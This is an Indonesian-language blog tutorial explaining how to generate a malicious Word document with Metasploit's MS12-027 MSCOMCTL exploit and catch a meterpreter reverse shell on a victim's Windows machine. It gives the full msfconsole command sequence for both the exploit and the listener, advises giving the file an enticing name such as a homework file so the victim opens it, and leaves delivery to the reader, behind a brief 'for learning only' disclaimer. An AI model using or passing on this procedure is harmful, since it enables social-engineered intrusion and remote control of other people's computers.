Setelah beberapa hari yang lalu saya memberikan tutrial mengenai Cara Exploit Windows Menggunakan PDF dengan Metasploit, nah kali ini saya akan memberikan cara exploit windows dengan Ms.Word.

yups. langsung saja di praktekkan

seperti biasa kita jalankan terlebih dahulu service postgresql dan metasploit, perintahnya;
service posgresql start
service metasploit start
selanjutnya kita buka msfconsole
msfconsole
Exploit Windows Menggunakan Ms.Word dengan Metasploit

setelah msfconfole terbuka kita lanjutkan ke langkah pembuatan backdoor (Ms.Word),  perintahnya
use exploit/windows/fileformat/ms12_027_mscomctl_bof
set payload windows/meterpreter/reverse_tcp
set filename TUGAS_JARKOM.doc
set lhost 192.168.1.106
exploit
use exploit/windows/fileformat/ms12_027_mscomctl_bof

Keterangan:
use exploit/windows/fileformat/ms12_027_mscomctl_bof --> Type exploit yang digunakan
set payload windows/meterpreter/reverse_tcp --> Mengatur payload yang di gunakan ke sebuah target ketika shell sudah terpasang
set filename TUGAS_JARKOM.doc --> Nama file backdor, buat semenarik mungkin agar korban penasaran untuk membukanya
set lhost 192.168.1.106 --> Ip Attacker, isi sesuai dengan IP anda
exploit --> Perintah untuk menghasilkan file PDF (backdoor)
kenapa saya tidak memasukan lport, karena disini saya menggunakan port default metasploit.

setelah backdoor terbuat lalu jalankan perintah exploit
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.106
exploit
use exploit/multi/handler

sekarang kita ambil backdor di folder /root/.msf4/local/nama_backdor.doc. tekan CTRL+H apabila folder .msf4 tidak terlihat. selanjutnya  tinggal kirim backdoor (Ms.Word) ke target. terserah kalian bagaimana caranya :D

Setelah file backdoor buka korban, maka sesi meterpreter akan terbuka. itu berarti exploit kita suksess :D

Meterpreter sessions opened

Ini contohnya 

sysinfo

Sekian tutorial mengenai Cara Exploit Windows Menggunakan Ms.Word dengan Metasploit, semoga bisa bermanfaat, ini hanya sebuah pembelajaran, apabila ada penyalahgunaan dari tutorial ini itu diluar tanggung jawab saya. Terimakasih 

Posting Komentar

 
Top